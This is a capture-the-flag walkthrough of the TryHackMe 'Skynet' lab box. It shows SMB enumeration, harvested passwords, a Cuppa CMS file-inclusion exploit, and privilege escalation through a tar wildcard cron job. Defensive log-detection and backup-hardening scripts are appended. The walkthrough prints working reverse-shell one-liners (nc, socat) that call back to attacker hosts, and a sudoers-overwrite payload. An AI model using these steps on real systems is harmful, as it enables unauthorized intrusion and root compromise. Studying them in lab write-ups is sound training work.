SKYNET THM{}
IP: 10.10.182.131. Using HackTricks as a reference for the methodology, this is the procedure followed:
NMAP
nmap -A -sC -T4 10.10.182.131
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 03:59 EDT
Nmap scan report for 10.10.182.131
Host is up (0.080s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES SASL AUTH-RESP-CODE CAPA UIDL PIPELINING TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have capabilities more listed SASL-IR Pre-login IMAP4rev1 post-login IDLE LOGINDISABLEDA0001 ID ENABLE LOGIN-REFERRALS LITERAL+ OK
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-03-21T07:59:35
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-03-21T02:59:35-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds
Two things look interesting: the web page on port 80 and the SMB service on 139/445.
SMB
Enumeration
enum4linux -a 10.10.182.131
=====================================================
| Enumerating Workgroup/Domain on 10.10.182.131 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 10.10.182.131 |
=============================================
Looking up status of 10.10.182.131
SKYNET <00> - B <ACTIVE> Workstation Service
SKYNET <03> - B <ACTIVE> Messenger Service
SKYNET <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=======================================
| OS information on 10.10.182.131 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.182.131 from smbclient:
[+] Got OS info for 10.10.182.131 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 10.10.182.131 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
==========================================
| Share Enumeration on 10.10.182.131 |
==========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
[+] Attempting to map shares on 10.10.182.131
//10.10.182.131/print$ Mapping: DENIED, Listing: N/A
//10.10.182.131/anonymous Mapping: OK, Listing: OK
//10.10.182.131/milesdyson Mapping: DENIED, Listing: N/A
//10.10.182.131/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
The share enumeration is very interesting; let's try to connect to the shared folders.
Connect to the anonymous share
smbclient -U '%' -N \\\\10.10.182.131\\anonymous
smb: \> dir
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
Inside the logs directory we obtain a file called log1.txt containing a list of passwords. Let's try them on the webpage with the user milesdyson.
Webpage
Gobuster
gobuster dir -u http://10.10.182.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.182.131
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/21 04:13:57 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://10.10.182.131/admin/]
/css (Status: 301) [Size: 312] [--> http://10.10.182.131/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.182.131/js/]
/config (Status: 301) [Size: 315] [--> http://10.10.182.131/config/]
/ai (Status: 301) [Size: 311] [--> http://10.10.182.131/ai/]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.182.131/squirrelmail/]
After trying the different directories, /squirrelmail serves a login page. We can try the passwords from log1.txt with the username milesdyson here.
Squirrelmail
<IP>/squirrelmail
user: milesdyson
pass: cyborg007haloterminator
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 10:10 pm
Priority: Normal
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
So now we can try this password in the /milesdyson share.
milesdyson share
smbclient -U 'milesdyson' \\\\10.10.182.131\\milesdyson
We are prompted for the password.
smb: \notes\> dir
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
There is a file called important.txt that mentions a hidden folder on the web server.
cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Gobuster with new page
We run gobuster against the hidden directory.
gobuster dir -u http://10.10.247.90/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.247.90/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/21 09:46:30 Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 337] [--> http://10.10.247.90/45kra24zxs28v3yd/administrator/]
Cuppa CMS
After identifying this CMS, an RFI exploit for it is found on Exploit-DB.
On the local machine, we start a Python HTTP server in the directory holding the Pentestmonkey PHP reverse shell script (saved as shell.php).
python3 -m http.server 8000
And also a listener on the local IP and the port preconfigured in the payload.
nc -lvnp 5555
Now we use that in our browser
http://10.10.85.87/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.18.13.133:8000/shell.php
And we obtain the shell
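As an added defensive example (not part of the original writeup), the request shape used above is easy to recognise in web server logs: a query parameter whose value is itself a URL. The POSIX shell script below, with constructed Apache combined-format log lines embedded inline (addresses taken from the RFC 5737 documentation ranges) and hypothetical function names, flags such requests and lists their source addresses.

```shell
#!/bin/sh
# Added example, not from the original writeup. Function names are hypothetical.
# Detects remote/stream-inclusion attempts: any query parameter whose value
# carries a URL scheme. Runs over a constructed sample so it works offline.

# Constructed Apache combined-format log. Only the second line has a
# parameter value that is a URL (the RFI shape from the writeup).
SAMPLE_LOG='192.0.2.10 - - [21/Mar/2022:04:13:57 -0400] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.77 - - [21/Mar/2022:09:50:01 -0400] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://198.51.100.5:8000/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Mar/2022:09:51:12 -0400] "GET /45kra24zxs28v3yd/administrator/?page=home HTTP/1.1" 200 4096 "-" "Mozilla/5.0"'

# Read log lines on stdin; print those whose query string contains a
# parameter value starting with http:, https:, ftp:, php: or data:
# (php: covers stream wrappers such as php://input used for the same purpose).
flag_remote_include() {
    awk '
    {
        # In the combined format field 7 is the request path plus query string.
        n = index($7, "?")
        if (n == 0) next
        qs = substr($7, n + 1)
        m = split(qs, params, "&")
        for (i = 1; i <= m; i++) {
            eq = index(params[i], "=")
            if (eq == 0) continue
            val = tolower(substr(params[i], eq + 1))
            if (val ~ /^(https?|ftp|php|data):/) { print; break }
        }
    }'
}

# Number of flagged lines in the sample; a periodic check can alert when > 0.
count_flagged_in_sample() {
    printf '%s\n' "$SAMPLE_LOG" | flag_remote_include | wc -l | tr -d ' '
}

# Distinct source addresses of flagged requests, for blocking or for
# pivoting into other logs.
flagged_sources_in_sample() {
    printf '%s\n' "$SAMPLE_LOG" | flag_remote_include | awk '{print $1}' | sort -u
}

# Stand-alone run: print the flagged lines and their sources.
[ "${1:-}" = "demo" ] && printf '%s\n' "$SAMPLE_LOG" | flag_remote_include && flagged_sources_in_sample
```

On a real host the detector reads /var/log/apache2/access.log instead of the embedded sample (sh detect.sh demo shows the sample run). Values that arrive URL-encoded (http%3A%2F%2F...) are not decoded here, so a production version should decode the query string first. The underlying capability is removed by setting allow_url_include=Off in php.ini, which is the default in current PHP releases.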
Improve shell
- Improve the shell with the Python pty module
python -c 'import pty; pty.spawn("/bin/bash")'
- Improve the shell with socat
2.1 Download socat and serve it with a Python HTTP server on the local machine
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
2.2 Create a listening connection on our local machine
socat file:`tty`,raw,echo=0 tcp-listen:4444
2.3 Execute it on the remote machine
wget http://10.11.62.63:8000/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.62.63:4444
Linpeas
- Download linpeas.sh on the local machine
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220320/linpeas.sh
- Serve it on the Python HTTP server and download it on the remote machine
- After using linpeas, we found a cronjob with tar
*/1 * * * * root /home/milesdyson/backups/backup.sh
Now we read backup.sh:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
So, taking into account how tar handles wildcards (the shell expands * and tar parses any file name starting with -- as an option), we can exploit it with these commands:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.62.63 6666 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
There is more information about tar wildcards in the article Exploiting wildcards on Linux.
And do the following
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
And now we are able to do sudo cat /root/root.txt.
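Why the backup script is exploitable, and how to write it so that it is not, as an added example that is not part of the original writeup: the glob in tar cf backup.tgz * is expanded by the shell before tar runs, so a file whose name begins with -- reaches tar's option parser. The POSIX shell functions below (hypothetical names) build a constructed web root in a temporary directory, show that a file named --checkpoint=1 silently drops out of the archive when the page's command shape is used (GNU tar honours it as an option; other builds reject it), and show a hardened form that never lets a file name become an option. They also give a pre-flight check that a cron wrapper can run to flag option-looking names before archiving.

```shell
#!/bin/sh
# Added example, not from the original writeup. Helper names are hypothetical.
# Assumes a tar that accepts -C, -cf and -tf (GNU tar or busybox tar).

# Print entries of DIR whose names begin with "-": the only shape a wildcard
# abuse of "tar cf ... *" needs. Call it for its output, not its exit status.
find_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Number of such entries, usable as a pre-flight check in a cron wrapper
# (alert, or refuse to archive, when it is non-zero).
count_option_like_names() {
    find_option_like_names "$1" | wc -l | tr -d ' '
}

# The shape used by backup.sh on the page: cd into the tree, then glob.
# Kept only for contrast. Errors are silenced because some tar builds reject
# an unknown long option instead of honouring it; either way the file named
# like an option never lands in the archive as data.
unsafe_backup() {
    ( cd "$1" && tar cf "$2" * 2>/dev/null ) || true
}

# Hardened shape: no glob at all. "-C DIR ." archives the directory itself,
# so every member path starts with "./" and can never be parsed as an option.
safe_backup() {
    tar -C "$1" -cf "$2" .
}

# Constructed fixture: a temporary "web root" holding one ordinary file and
# one file whose name looks like a tar option (harmless by itself).
make_fixture() {
    d=$(mktemp -d)
    printf 'hello\n' > "$d/index.html"
    printf 'x\n' > "$d/--checkpoint=1"
    echo "$d"
}

# Exit 0 when ARCHIVE lists a member whose path, minus any leading "./",
# equals NAME. The "--" keeps grep from treating NAME as an option.
archive_has() {
    tar -tf "$1" 2>/dev/null | sed 's|^\./||' | grep -qx -- "$2"
}

# Stand-alone demonstration: sh backup_check.sh demo
demo() {
    root=$(make_fixture)
    echo "option-looking names in $root: $(count_option_like_names "$root")"
    unsafe_backup "$root" "$root.unsafe.tar"
    safe_backup "$root" "$root.safe.tar"
    if archive_has "$root.unsafe.tar" "--checkpoint=1"; then
        echo "unsafe form: file archived"
    else
        echo "unsafe form: file dropped (consumed as a tar option)"
    fi
    if archive_has "$root.safe.tar" "--checkpoint=1"; then
        echo "safe form: file archived as data"
    fi
}
[ "${1:-}" = "demo" ] && demo
```

The hardened form also removes the need to cd into /var/www/html at all; if a script must keep the glob, tar cf backup.tgz -- * stops the names from being parsed as options, and the count check above gives a cheap way to notice that someone has planted such names before the job runs.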